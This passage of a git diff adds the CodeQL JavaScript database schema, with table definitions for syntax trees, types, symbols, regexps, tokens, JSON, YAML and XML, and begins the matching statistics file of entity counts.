@scope ref); + +#keyset[scope, name] +local_type_names (unique int id: @local_type_name, + varchar(900) name: string ref, + int scope: @scope ref); + +#keyset[scope, name] +local_namespace_names (unique int id: @local_namespace_name, + varchar(900) name: string ref, + int scope: @scope ref); + +is_arguments_object (int id: @variable ref); + +@lexical_name = @variable | @local_type_name | @local_namespace_name; + +@bind_id = @varaccess | @local_var_type_access; +bind (unique int id: @bind_id ref, + int decl: @variable ref); + +decl (unique int id: @var_decl ref, + int decl: @variable ref); + +@typebind_id = @local_type_access | @export_varaccess; +typebind (unique int id: @typebind_id 
ref, + int decl: @local_type_name ref); + +@typedecl_id = @type_decl | @var_decl; +typedecl (unique int id: @typedecl_id ref, + int decl: @local_type_name ref); + +namespacedecl (unique int id: @var_decl ref, + int decl: @local_namespace_name ref); + +@namespacebind_id = @local_namespace_access | @export_varaccess; +namespacebind (unique int id: @namespacebind_id ref, + int decl: @local_namespace_name ref); + + +// properties in object literals, property patterns in object patterns, and method declarations in classes +#keyset[parent, index] +properties (unique int id: @property, + int parent: @property_parent ref, + int index: int ref, + int kind: int ref, + varchar(900) tostring: string ref); + +case @property.kind of + 0 = @value_property +| 1 = @property_getter +| 2 = @property_setter +| 3 = @jsx_attribute +| 4 = @function_call_signature +| 5 = @constructor_call_signature +| 6 = @index_signature +| 7 = @enum_member +| 8 = @proper_field +| 9 = @parameter_field +| 10 = @static_initializer +; + +@property_parent = @obj_expr | @object_pattern | @class_definition | @jsx_element | @interface_definition | @enum_declaration; +@property_accessor = @property_getter | @property_setter; +@call_signature = @function_call_signature | @constructor_call_signature; +@field = @proper_field | @parameter_field; +@field_or_vardeclarator = @field | @var_declarator; + +is_computed (int id: @property ref); +is_method (int id: @property ref); +is_static (int id: @property ref); +is_abstract_member (int id: @property ref); +is_const_enum (int id: @enum_declaration ref); +is_abstract_class (int id: @class_decl_stmt ref); + +has_public_keyword (int id: @property ref); +has_private_keyword (int id: @property ref); +has_protected_keyword (int id: @property ref); +has_readonly_keyword (int id: @property ref); +has_type_keyword (int id: @type_keyword_operand ref); +is_optional_member (int id: @property ref); +has_definite_assignment_assertion (int id: @field_or_vardeclarator ref); 
+is_optional_parameter_declaration (unique int parameter: @pattern ref); + +#keyset[constructor, param_index] +parameter_fields( + unique int field: @parameter_field ref, + int constructor: @function_expr ref, + int param_index: int ref +); + +// types +#keyset[parent, idx] +typeexprs ( + unique int id: @typeexpr, + int kind: int ref, + int parent: @typeexpr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref +); + +case @typeexpr.kind of + 0 = @local_type_access +| 1 = @type_decl +| 2 = @keyword_typeexpr +| 3 = @string_literal_typeexpr +| 4 = @number_literal_typeexpr +| 5 = @boolean_literal_typeexpr +| 6 = @array_typeexpr +| 7 = @union_typeexpr +| 8 = @indexed_access_typeexpr +| 9 = @intersection_typeexpr +| 10 = @parenthesized_typeexpr +| 11 = @tuple_typeexpr +| 12 = @keyof_typeexpr +| 13 = @qualified_type_access +| 14 = @generic_typeexpr +| 15 = @type_label +| 16 = @typeof_typeexpr +| 17 = @local_var_type_access +| 18 = @qualified_var_type_access +| 19 = @this_var_type_access +| 20 = @predicate_typeexpr +| 21 = @interface_typeexpr +| 22 = @type_parameter +| 23 = @plain_function_typeexpr +| 24 = @constructor_typeexpr +| 25 = @local_namespace_access +| 26 = @qualified_namespace_access +| 27 = @mapped_typeexpr +| 28 = @conditional_typeexpr +| 29 = @infer_typeexpr +| 30 = @import_type_access +| 31 = @import_namespace_access +| 32 = @import_var_type_access +| 33 = @optional_typeexpr +| 34 = @rest_typeexpr +| 35 = @bigint_literal_typeexpr +| 36 = @readonly_typeexpr +| 37 = @template_literal_typeexpr +; + +@typeref = @typeaccess | @type_decl; +@type_identifier = @type_decl | @local_type_access | @type_label | @local_var_type_access | @local_namespace_access; +@typeexpr_parent = @expr | @stmt | @property | @typeexpr; +@literal_typeexpr = @string_literal_typeexpr | @number_literal_typeexpr | @boolean_literal_typeexpr | @bigint_literal_typeexpr; +@typeaccess = @local_type_access | @qualified_type_access | @import_type_access; +@vartypeaccess = 
@local_var_type_access | @qualified_var_type_access | @this_var_type_access | @import_var_type_access; +@namespace_access = @local_namespace_access | @qualified_namespace_access | @import_namespace_access; +@import_typeexpr = @import_type_access | @import_namespace_access | @import_var_type_access; + +@function_typeexpr = @plain_function_typeexpr | @constructor_typeexpr; + +// types +types ( + unique int id: @type, + int kind: int ref, + varchar(900) tostring: string ref +); + +#keyset[parent, idx] +type_child ( + int child: @type ref, + int parent: @type ref, + int idx: int ref +); + +case @type.kind of + 0 = @any_type +| 1 = @string_type +| 2 = @number_type +| 3 = @union_type +| 4 = @true_type +| 5 = @false_type +| 6 = @type_reference +| 7 = @object_type +| 8 = @canonical_type_variable_type +| 9 = @typeof_type +| 10 = @void_type +| 11 = @undefined_type +| 12 = @null_type +| 13 = @never_type +| 14 = @plain_symbol_type +| 15 = @unique_symbol_type +| 16 = @objectkeyword_type +| 17 = @intersection_type +| 18 = @tuple_type +| 19 = @lexical_type_variable_type +| 20 = @this_type +| 21 = @number_literal_type +| 22 = @string_literal_type +| 23 = @unknown_type +| 24 = @bigint_type +| 25 = @bigint_literal_type +; + +@boolean_literal_type = @true_type | @false_type; +@symbol_type = @plain_symbol_type | @unique_symbol_type; +@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: 
@symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int 
ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent 
ref,
+ int idx: int ref,
+ varchar(900) tostring: string ref);
+
+@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr;
+
+case @regexpterm.kind of
+ 0 = @regexp_alt
+| 1 = @regexp_seq
+| 2 = @regexp_caret
+| 3 = @regexp_dollar
+| 4 = @regexp_wordboundary
+| 5 = @regexp_nonwordboundary
+| 6 = @regexp_positive_lookahead
+| 7 = @regexp_negative_lookahead
+| 8 = @regexp_star
+| 9 = @regexp_plus
+| 10 = @regexp_opt
+| 11 = @regexp_range
+| 12 = @regexp_dot
+| 13 = @regexp_group
+| 14 = @regexp_normal_constant
+| 15 = @regexp_hex_escape
+| 16 = @regexp_unicode_escape
+| 17 = @regexp_dec_escape
+| 18 = @regexp_oct_escape
+| 19 = @regexp_ctrl_escape
+| 20 = @regexp_char_class_escape
+| 21 = @regexp_id_escape
+| 22 = @regexp_backref
+| 23 = @regexp_char_class
+| 24 = @regexp_char_range
+| 25 = @regexp_positive_lookbehind
+| 26 = @regexp_negative_lookbehind
+| 27 = @regexp_unicode_property_escape;
+
+regexp_parse_errors (unique int id: @regexp_parse_error,
+ int regexp: @regexpterm ref,
+ varchar(900) message: string ref);
+
+@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range;
+@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape;
+@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape;
+@regexp_constant = @regexp_normal_constant | @regexp_char_escape;
+@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead;
+@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind;
+@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind;
+@regexp_anchor = @regexp_dollar | @regexp_caret;
+
+is_greedy (int id: @regexp_quantifier ref);
+range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref);
+range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref);
+is_capture (unique int id: @regexp_group ref, int number: int ref);
+is_named_capture (unique int id: @regexp_group ref, string name: string ref);
+is_inverted (int id: @regexp_char_class ref);
+regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref);
+char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref);
+backref (unique int id: @regexp_backref ref, int value: int ref);
+named_backref (unique int id: @regexp_backref ref, string name: string ref);
+unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref);
+unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref);
+
+// tokens
+#keyset[toplevel, idx]
+tokeninfo (unique int id: @token,
+ int kind: int ref,
+ int toplevel: @toplevel ref,
+ int idx: int ref,
+ varchar(900) value: string ref);
+
+case @token.kind of
+ 0 = @token_eof
+| 1 = @token_null_literal
+| 2 = @token_boolean_literal
+| 3 = @token_numeric_literal
+| 4 = @token_string_literal
+| 5 = @token_regular_expression
+| 6 = @token_identifier
+| 7 = @token_keyword
+| 8 = @token_punctuator;
+
+// associate comments with the token immediately following them (which may be EOF)
+next_token (int comment: @comment ref, int token: @token ref);
+
+// JSON
+#keyset[parent, idx]
+json (unique int id: @json_value,
+ int kind: int ref,
+ int parent: @json_parent ref,
+ int idx: int ref,
+ varchar(900) tostring: string ref);
+
+json_literals (varchar(900) value: string ref,
+ varchar(900) raw: string ref,
+ unique int expr: @json_value ref);
+
+json_properties (int obj: @json_object ref,
+ varchar(900) property: string ref,
+ int value: @json_value ref);
+
+json_errors (unique int id: @json_parse_error,
+ varchar(900) message: string ref);
+
+json_locations(unique int locatable: @json_locatable ref,
+ int location: @location_default ref);
+
+case @json_value.kind of
+ 0 = @json_null
+| 1 = @json_boolean
+| 2 = @json_number
+| 3 = @json_string
+| 4 = @json_array
+| 5 = @json_object;
+
+@json_parent = @json_object | @json_array | @file;
+
+@json_locatable = @json_value | @json_parse_error;
+
+// locations
+@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr;
+
+@locatable = @file
+ | @ast_node
+ | @comment
+ | @line
+ | @js_parse_error | @regexp_parse_error
+ | @regexpterm
+ | @json_locatable
+ | @token
+ | @cfg_node
+ | @jsdoc | @jsdoc_type_expr | @jsdoc_tag
+ | @yaml_locatable
+ | @xmllocatable
+ | @configLocatable
+ | @template_placeholder_tag;
+
+hasLocation (unique int locatable: @locatable ref,
+ int location: @location ref);
+
+// CFG
+entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref);
+exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref);
+guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref);
+case @guard_node.kind of
+ 0 = @falsy_guard
+| 1 = @truthy_guard;
+@condition_guard = @falsy_guard | @truthy_guard;
+
+@synthetic_cfg_node = @entry_node | @exit_node | @guard_node;
+@cfg_node = @synthetic_cfg_node | @expr_parent;
+
+successor (int pred: @cfg_node ref, int succ: @cfg_node ref);
+
+// JSDoc comments
+jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref);
+#keyset[parent, idx]
+jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref,
+ int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref);
+jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref);
+jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref);
+
+#keyset[parent, idx]
+jsdoc_type_exprs (unique int id: @jsdoc_type_expr,
+ int kind: int ref,
+ int parent: @jsdoc_type_expr_parent ref,
+ int idx: int ref,
+ varchar(900) tostring: string ref);
+case @jsdoc_type_expr.kind of
+ 0 = @jsdoc_any_type_expr
+| 1 = @jsdoc_null_type_expr
+| 2 = @jsdoc_undefined_type_expr
+| 3 = @jsdoc_unknown_type_expr
+| 4 = @jsdoc_void_type_expr
+| 5 = @jsdoc_named_type_expr
+| 6 = @jsdoc_applied_type_expr
+| 7 = @jsdoc_nullable_type_expr
+| 8 = @jsdoc_non_nullable_type_expr
+| 9 = @jsdoc_record_type_expr
+| 10 = @jsdoc_array_type_expr
+| 11 = @jsdoc_union_type_expr
+| 12 = @jsdoc_function_type_expr
+| 13 = @jsdoc_optional_type_expr
+| 14 = @jsdoc_rest_type_expr
+;
+
+#keyset[id, idx]
+jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref);
+jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref);
+jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref);
+
+@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag;
+
+jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref);
+
+@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property;
+
+@optionalchainable = @call_expr | @propaccess;
+
+isOptionalChaining(int id: @optionalchainable ref);
+
+/**
+ * The time taken for the extraction of a file.
+ * This table contains non-deterministic content.
+ *
+ * The sum of the `time` column for each (`file`, `timerKind`) pair
+ * is the total time taken for extraction of `file`. The `extractionPhase`
+ * column provides a granular view of the extraction time of the file.
+ */
+extraction_time(
+ int file : @file ref,
+ // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`.
+ int extractionPhase: int ref,
+ // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds
+ int timerKind: int ref,
+ float time: float ref
+)
+
+/**
+* Non-timing related data for the extraction of a single file.
+* This table contains non-deterministic content.
+*/
+extraction_data(
+ int file : @file ref,
+ // the absolute path to the cache file
+ varchar(900) cacheFile: string ref,
+ boolean fromCache: boolean ref,
+ int length: int ref
+)
+
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- XML Files -*/
+
+xmlEncoding(
+ unique int id: @file ref,
+ string encoding: string ref
+);
+
+xmlDTDs(
+ unique int id: @xmldtd,
+ string root: string ref,
+ string publicId: string ref,
+ string systemId: string ref,
+ int fileid: @file ref
+);
+
+xmlElements(
+ unique int id: @xmlelement,
+ string name: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlAttrs(
+ unique int id: @xmlattribute,
+ int elementid: @xmlelement ref,
+ string name: string ref,
+ string value: string ref,
+ int idx: int ref,
+ int fileid: @file ref
+);
+
+xmlNs(
+ int id: @xmlnamespace,
+ string prefixName: string ref,
+ string URI: string ref,
+ int fileid: @file ref
+);
+
+xmlHasNs(
+ int elementId: @xmlnamespaceable ref,
+ int nsId: @xmlnamespace ref,
+ int fileid: @file ref
+);
+
+xmlComments(
+ unique int id: @xmlcomment,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int fileid: @file ref
+);
+
+xmlChars(
+ unique int id: @xmlcharacters,
+ string text: string ref,
+ int parentid: @xmlparent ref,
+ int idx: int ref,
+ int isCDATA: int ref,
+ int fileid: @file ref
+);
+
+@xmlparent = @file | @xmlelement;
+@xmlnamespaceable = @xmlelement | @xmlattribute;
+
+xmllocations(
+ int xmlElement: @xmllocatable ref,
+ int location: @location_default ref
+);
+
+@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace;
+
+/*- Configuration files with key value pairs -*/
+
+configs(
+ unique int id: @config
+);
+
+configNames(
+ unique int id: @configName,
+ int config: @config ref,
+ string name: string ref
+);
+
+configValues(
+ unique int id: @configValue,
+ int config: @config ref,
+ string value: string ref
+);
+
+configLocations(
+ int locatable: @configLocatable ref,
+ int location: @location_default ref
+);
+
+@configLocatable = @config | @configName | @configValue;
diff --git a/ql/src/semmlecode.javascript.dbscheme.stats b/ql/src/semmlecode.javascript.dbscheme.stats
new file mode 100644
index 000000000000..97ba6f9bcc36
--- /dev/null
+++ b/ql/src/semmlecode.javascript.dbscheme.stats
@@ -0,0 +1,28248 @@ + + + + +@location_default +15664049 + + +@file +6457 + + +@folder +1590 + + +@externalDataElement +950 + + +@toplevel +5320 + + +@script +5200 + + +@inline_script +86 + + +@event_handler +31 + + +@javascript_url +3 + + +@template_toplevel +100 + + +@stmt +1096691 + + +@empty_stmt +1136 + + +@block_stmt +204994 + + +@expr_stmt +610340 + + +@if_stmt +68214 + + +@labeled_stmt +1378 + + +@break_stmt +10149 + + +@continue_stmt +1642 + + +@with_stmt +4 + + +@switch_stmt +1569 + + +@return_stmt +48209 + + +@throw_stmt +2305 + + +@try_stmt +1316 + + +@while_stmt +3120 + + +@do_while_stmt +1471 + + +@for_stmt +5385 + + +@for_in_stmt +1315 + + +@debugger_stmt +3 + + +@function_decl_stmt +16771 + + +@var_decl_stmt +105606 + + +@case +8674 + + +@catch_clause +1272 + + +@for_of_stmt +61 + + +@const_decl_stmt +1118 + + +@let_stmt +551 + + +@legacy_let_stmt +1 + + +@for_each_stmt +1 + + +@class_decl_stmt +41 + + +@import_declaration +8 + + +@export_all_declaration +1 + + +@export_as_namespace_declaration +5 + + +@global_augmentation_declaration +5 + + +@using_decl_stmt +5 + + +@export_default_declaration +5 + + +@export_named_declaration +31 + + +@expr +5495305 + + +@label +722373 + + +@null_literal +15525 + + +@boolean_literal +31652 + + +@number_literal +557620 + + +@string_literal +268843 + + +@regexp_literal +2773 + + +@this_expr +128651 + + +@array_expr +28131 + + +@obj_expr +50958 + + +@function_expr +95744 + + +@seq_expr +2457 + + +@conditional_expr +8111 + + +@new_expr +19023 + + +@call_expr +487075 + + +@dot_expr +602582 + + +@index_expr +105192 + + +@neg_expr +11993 + + +@plus_expr +731 + + +@log_not_expr +19385 + + +@bit_not_expr +403 + + +@typeof_expr +4540 + + +@void_expr +51 + + +@delete_expr +1310 + + +@eq_expr +13468 + + +@neq_expr +5338 + + +@eqq_expr +17758 + + +@neqq_expr +5818 + + +@lt_expr +10254 + + +@le_expr +1503 + + +@gt_expr +5438 + + +@ge_expr +2527 + + +@lshift_expr +5655 + + +@rshift_expr +27749 + + +@urshift_expr +4331 + + 
+@add_expr +88032 + + +@sub_expr +10789 + + +@mul_expr +14075 + + +@div_expr +2496 + + +@mod_expr +655 + + +@bitor_expr +42853 + + +@xor_expr +503 + + +@bitand_expr +8538 + + +@in_expr +1135 + + +@instanceof_expr +1184 + + +@logand_expr +15892 + + +@logor_expr +12711 + + +@assign_expr +245084 + + +@assign_add_expr +6231 + + +@assign_sub_expr +823 + + +@assign_mul_expr +143 + + +@assign_div_expr +44 + + +@assign_mod_expr +17 + + +@assign_lshift_expr +57 + + +@assign_rshift_expr +86 + + +@assign_urshift_expr +96 + + +@assign_or_expr +586 + + +@assign_xor_expr +108 + + +@assign_and_expr +222 + + +@assignlogandexpr +1 + + +@assignlogorexpr +1 + + +@assignnullishcoalescingexpr +1 + + +@template_placeholder_tag +100 + + +@template_pipe_ref +100 + + +@generated_code_expr +100 + + +@satisfies_expr +100 + + +@preinc_expr +1792 + + +@postinc_expr +7103 + + +@predec_expr +457 + + +@postdec_expr +774 + + +@par_expr +86199 + + +@var_declarator +130843 + + +@arrow_function_expr +3730 + + +@spread_element +50 + + +@array_pattern +57 + + +@object_pattern +122 + + +@yield_expr +81 + + +@tagged_template_expr +27 + + +@template_literal +408 + + +@template_literal_typeexpr +100 + + +@template_element +639 + + +@array_comprehension_expr +3 + + +@generator_expr +1 + + +@for_in_comprehension_block +1 + + +@for_of_comprehension_block +3 + + +@legacy_letexpr +1 + + +@var_decl +250257 + + +@proper_varaccess +1295408 + + +@super_expr +11 + + +@newtarget_expr +1 + + +@import_meta_expr +1 + + +@named_import_specifier +4 + + +@import_default_specifier +4 + + +@import_namespace_specifier +2 + + +@named_export_specifier +5 + + +@export_default_specifier +5 + + +@export_namespace_specifier +5 + + +@export_assign_declaration +5 + + +@interface_declaration +5 + + +@type_alias_declaration +120 + + +@enum_declaration +252 + + +@external_module_declaration +100 + + +@external_module_reference +5 + + +@expression_with_type_arguments +45 + + +@prefix_type_assertion +1721 + + +@as_type_assertion +368 + + 
+@export_varaccess +15 + + +@decorator_list +2575 + + +@non_null_assertion +2159 + + +@dynamic_import +5 + + +@import_equals_declaration +5 + + +@namespace_declaration +5 + + +@namespace_scope +5 + + +@exp_expr +14075 + + +@assign_exp_expr +143 + + +@class_expr +41 + + +@scope +118172 + + +@global_scope +1 + + +@function_scope +116245 + + +@catch_scope +1272 + + +@module_scope +21 + + +@block_scope +584 + + +@for_scope +17 + + +@for_in_scope +28 + + +@comprehension_block_scope +4 + + +@class_expr_scope +41 + + +@class_decl_scope +2693 + + +@interface_scope +200 + + +@type_alias_scope +11 + + +@enum_scope +252 + + +@external_module_scope +100 + + +@mapped_type_scope +10 + + +@conditional_type_scope +100 + + +@variable +364388 + + +@local_type_name +23565 + + +@local_namespace_name +20832 + + +@property +142723 + + +@value_property +140856 + + +@property_getter +1529 + + +@property_setter +338 + + +@jsx_attribute +100 + + +@function_call_signature +2458 + + +@constructor_call_signature +37 + + +@index_signature +504 + + +@enum_member +2026 + + +@proper_field +16934 + + +@parameter_field +2693 + + +@static_initializer +100 + + +@local_type_access +25491 + + +@type_decl +2513 + + +@keyword_typeexpr +25306 + + +@string_literal_typeexpr +733 + + +@number_literal_typeexpr +3 + + +@boolean_literal_typeexpr +4 + + +@array_typeexpr +4579 + + +@union_typeexpr +852 + + +@intersection_typeexpr +27 + + +@parenthesized_typeexpr +62 + + +@tuple_typeexpr +98 + + +@keyof_typeexpr +3 + + +@indexed_access_typeexpr +3 + + +@qualified_type_access +3559 + + +@import_namespace_access +100 + + +@import_type_access +100 + + +@import_var_type_access +100 + + +@optional_typeexpr +100 + + +@rest_typeexpr +100 + + +@readonly_typeexpr +100 + + +@bigint_literal_typeexpr +100 + + +@generic_typeexpr +5220 + + +@type_label +3559 + + +@typeof_typeexpr +24 + + +@local_var_type_access +24 + + +@qualified_var_type_access +15 + + +@this_var_type_access +20 + + +@predicate_typeexpr +86 + + 
+@interface_typeexpr +1038 + + +@type_parameter +3463 + + +@plain_function_typeexpr +1674 + + +@local_namespace_access +4671 + + +@qualified_namespace_access +20 + + +@constructor_typeexpr +20 + + +@mapped_typeexpr +20 + + +@conditional_typeexpr +100 + + +@infer_typeexpr +100 + + +@comment +104947 + + +@any_type +1 + + +@string_type +1 + + +@number_type +1 + + +@union_type +1802 + + +@true_type +1 + + +@false_type +1 + + +@type_reference +12383 + + +@object_type +159099 + + +@canonical_type_variable_type +650 + + +@typeof_type +2903 + + +@void_type +1 + + +@undefined_type +1 + + +@null_type +1 + + +@never_type +1 + + +@plain_symbol_type +1 + + +@objectkeyword_type +1 + + +@intersection_type +369 + + +@tuple_type +307 + + +@lexical_type_variable_type +50 + + +@this_type +2731 + + +@number_literal_type +1244 + + +@string_literal_type +30638 + + +@unknown_type +100 + + +@bigint_type +100 + + +@bigint_literal_type +100 + + +@unique_symbol_type +100 + + +@root_symbol +2385 + + +@member_symbol +7223 + + +@other_symbol +584 + + +@function_signature_type +34698 + + +@constructor_signature_type +2646 + + +@slashslash_comment +76841 + + +@slashstar_comment +8834 + + +@doc_comment +19270 + + +@html_comment_start +1 + + +@htmlcommentend +1 + + +@line +1622184 + + +@js_parse_error +8 + + +@regexpterm +33197 + + +@regexp_alt +641 + + +@regexp_seq +3371 + + +@regexp_caret +826 + + +@regexp_dollar +637 + + +@regexp_wordboundary +99 + + +@regexp_nonwordboundary +3 + + +@regexp_positive_lookahead +15 + + +@regexp_negative_lookahead +12 + + +@regexp_star +1057 + + +@regexp_plus +1067 + + +@regexp_opt +478 + + +@regexp_range +146 + + +@regexp_dot +445 + + +@regexp_group +1692 + + +@regexp_normal_constant +15489 + + +@regexp_hex_escape +59 + + +@regexp_unicode_escape +264 + + +@regexp_dec_escape +7 + + +@regexp_oct_escape +1 + + +@regexp_ctrl_escape +599 + + +@regexp_char_class_escape +1573 + + +@regexp_id_escape +2613 + + +@regexp_backref +11 + + +@regexp_char_class +1473 + + 
+@regexp_char_range +619 + + +@regexp_positive_lookbehind +15 + + +@regexp_negative_lookbehind +12 + + +@regexp_unicode_property_escape +12 + + +@regexp_parse_error +122 + + +@token +8770869 + + +@token_eof +5312 + + +@token_null_literal +15526 + + +@token_boolean_literal +31654 + + +@token_numeric_literal +557620 + + +@token_string_literal +269555 + + +@token_regular_expression +2773 + + +@token_identifier +2268328 + + +@token_keyword +551767 + + +@token_punctuator +5068334 + + +@json_value +1643352 + + +@json_null +24 + + +@json_boolean +654 + + +@json_number +273113 + + +@json_string +752355 + + +@json_array +175925 + + +@json_object +441281 + + +@json_parse_error +1 + + +@entry_node +121542 + + +@exit_node +121542 + + +@guard_node +177785 + + +@jsdoc +19270 + + +@falsy_guard +86336 + + +@truthy_guard +91449 + + +@jsdoc_tag +29323 + + +@jsdoc_type_expr +22481 + + +@jsdoc_any_type_expr +292 + + +@jsdoc_null_type_expr +35 + + +@jsdoc_undefined_type_expr +287 + + +@jsdoc_unknown_type_expr +27 + + +@jsdoc_void_type_expr +8 + + +@jsdoc_named_type_expr +18639 + + +@jsdoc_applied_type_expr +303 + + +@jsdoc_nullable_type_expr +310 + + +@jsdoc_non_nullable_type_expr +536 + + +@jsdoc_record_type_expr +91 + + +@jsdoc_array_type_expr +19 + + +@jsdoc_union_type_expr +668 + + +@jsdoc_function_type_expr +316 + + +@jsdoc_optional_type_expr +895 + + +@jsdoc_rest_type_expr +55 + + +@jsdoc_error +1658 + + +@yaml_node +885 + + +@yaml_scalar_node +700 + + +@yaml_mapping_node +149 + + +@yaml_sequence_node +35 + + +@yaml_alias_node +1 + + +@yaml_error +1 + + +@jsx_element 